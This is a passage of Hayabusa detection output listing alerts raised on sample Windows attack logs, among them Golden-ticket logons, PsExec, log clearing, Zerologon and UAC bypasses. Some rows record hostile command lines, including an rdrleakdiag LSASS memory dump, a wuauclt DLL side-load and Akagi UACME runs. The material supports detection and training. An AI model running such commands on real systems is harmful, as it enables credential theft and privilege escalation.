Workstation: - : IP Address: 10.23.23.9 : Port: 50329 : LogonID: 0x119b90e2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50329 : LogonID: 
0x119b9a72,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50380 : LogonID: 0x119b9a8f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50381 : LogonID: 0x119b9aa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50382 : LogonID: 0x119b9ab2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:42:55.188 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50317 : LogonID: 0x119b9b27,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:43:04.967 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP 
Address: 10.23.23.9 : Port: 50329 : LogonID: 0x119b9e04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50380 : LogonID: 0x119ba401,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50381 : LogonID: 0x119ba414,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50382 : LogonID: 0x119ba427,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-27 20:40:56.397 +09:00,04246w-win10.threebeesco.com,11,low,PsExec Tool Execution,,rules/sigma/file_event/file_event_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,informational,Process Creation,Command: C:\WINDOWS\PSEXESVC.exe : Path: C:\Windows\PSEXESVC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\WINDOWS\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,PsExec Service Start,,rules/sigma/process_creation/win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,PsExec Tool Execution,,rules/sigma/process_creation/process_creation_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-09-02 20:47:39.499 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-02 20:47:48.570 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown : Workstation: 04246W-WIN10 : IP Address: 172.16.66.142 : Port: 60726 : LogonID: 0x21a8c68,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-02 20:47:48.823 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown : Workstation: - : IP Address: 172.16.66.142 : Port: 60728 : LogonID: 0x21a8c80,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-02 20:47:48.842 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown : Workstation: - : IP Address: 
172.16.66.142 : Port: 60726 : LogonID: 0x21a8c9a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-05 22:28:40.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 3004 -s 632 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-05 22:33:34.590 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 3668 -s 4420 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-05 22:34:11.983 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x4 /state0:0xa3cea855 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-05 22:37:07.245 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x2 /state0:0xa3bd2855 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-09 22:18:23.627 +09:00,MSEDGEWIN10,4625,low,Logon 
Failure - Wrong Password,User: IEUser : Type: 2 : Workstation: MSEDGEWIN10 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx +2020-09-09 22:18:27.714 +09:00,MSEDGEWIN10,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: MSEDGEWIN10 : IP Address: - : Port: - : LogonID: 0x1cd8f6 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx +2020-09-09 22:18:27.714 +09:00,MSEDGEWIN10,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: MSEDGEWIN10 : IP Address: - : Port: - : LogonID: 0x1cd964 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx +2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx +2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx +2020-09-14 23:44:04.878 +09:00,Sec504Student,1102,high,Security log was cleared,User: 
Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx +2020-09-16 03:04:36.333 +09:00,MSEDGEWIN10,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx +2020-09-16 03:04:39.987 +09:00,MSEDGEWIN10,4648,informational,Explicit Logon,Source User: svc01 : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\inetsrv\w3wp.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx +2020-09-16 04:28:17.594 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx +2020-09-16 04:28:31.453 +09:00,01566s-win16-ir.threebeesco.com,104,high,System log file was cleared,User: a-jbrown,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_CVE-2020-1472_DFIR_System_NetLogon_Error_EventID_5805.evtx +2020-09-16 04:29:51.507 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: 02694W-WIN10 : IP Address: 172.16.66.37 : Port: 49707 : LogonID: 0x31ff6e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx +2020-09-16 04:29:51.517 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: 02694W-WIN10 : IP Address: 172.16.66.37 : Port: 49707 : LogonID: 0x31ff89,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx +2020-09-16 18:31:19.133 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Hidden user account created! (Possible Backdoor),User: $ : SID:S-1-5-21-308926384-506822093-3341789130-107103,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx +2020-09-16 18:32:13.647 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Hidden user account created! (Possible Backdoor),User: $ : SID:S-1-5-21-308926384-506822093-3341789130-107104,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx +2020-09-17 19:57:37.013 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx +2020-09-17 19:57:44.254 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation 02694W-WIN10 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx 
+2020-09-17 19:57:44.270 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: 02694W-WIN10 : IP Address: 172.16.66.37 : Port: 49959 : LogonID: 0x853237,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx +2020-09-24 01:49:41.578 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:49:44.353 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{DC4537C3-CA73-4AC7-9E1D-B2CE27C3A7A6} : Path: C:\Windows\System32\dllhost.exe : User: 3B\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:49:44.380 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{49F6E667-6658-4BD1-9DE9-6AF87F9FAF85} : Path: C:\Windows\System32\dllhost.exe : User: 3B\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation : Status: 
0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: - : IP Address: 172.16.66.37 : Port: 50106 : LogonID: 0x1136e95,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:16.702 +09:00,01566s-win16-ir.threebeesco.com,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:16.892 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 5424 -s 4616 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: - : IP Address: 172.16.66.37 : Port: 50107 : LogonID: 
0x1137987,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:17.200 +09:00,01566s-win16-ir.threebeesco.com,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:19.821 +09:00,01566s-win16-ir.threebeesco.com,1,informational,Process Creation,Command: C:\Windows\system32\wermgr.exe -upload : Path: C:\Windows\System32\wermgr.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,informational,Process Creation,"Command: rdrleakdiag.exe /p 668 /o C:\Users\wanwan\Desktop /fullmemdmp /snap : Path: C:\Windows\System32\rdrleakdiag.exe : User: DESKTOP-PIU87N6\wanwan : Parent Command: ""C:\WINDOWS\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,informational,Process Creation,Command: C:\WINDOWS\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\WINDOWS\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,critical,Suspicious LSASS Process Clone,,rules/sigma/process_creation/win_susp_lsass_clone.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-10-02 03:35:02.415 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: POC.exe : Path: C:\Users\Public\POC\bin\Debug\POC.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: Program : Path: C:\Users\Public\POC\bin\Debug\POC.exe : User: MSEDGEWIN10\IEUser : Parent Command: POC.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: C:\windows\system32\taskmgr.exe : Path: C:\Windows\System32\Taskmgr.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: Akagi_64.exe 59 cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: C:\windows\system32\taskmgr.exe : Path: C:\Windows\System32\Taskmgr.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: Akagi_64.exe 59 cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,informational,Process 
Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\windows\system32\taskmgr.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Taskmgr as Parent,,rules/sigma/process_creation/win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\windows\system32\taskmgr.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Taskmgr as Parent,,rules/sigma/process_creation/win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx +2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Windows\System32\mmc.exe"" WF.msc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx +2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx +2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx +2020-10-07 06:40:30.910 +09:00,02694w-win10.threebeesco.com,7,medium,Unsigned Image Loaded Into LSASS 
Process,,rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx +2020-10-07 06:40:42.943 +09:00,02694w-win10.threebeesco.com,7,medium,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx +2020-10-07 07:11:17.814 +09:00,02694w-win10.threebeesco.com,13,high,DLL Load via LSASS,,rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx +2020-10-07 07:11:17.848 +09:00,02694w-win10.threebeesco.com,12,high,DLL Load via LSASS,,rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx +2020-10-14 05:11:42.278 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx +2020-10-14 05:11:42.279 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx +2020-10-15 22:17:02.403 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\smartscreen.exe -Embedding : 
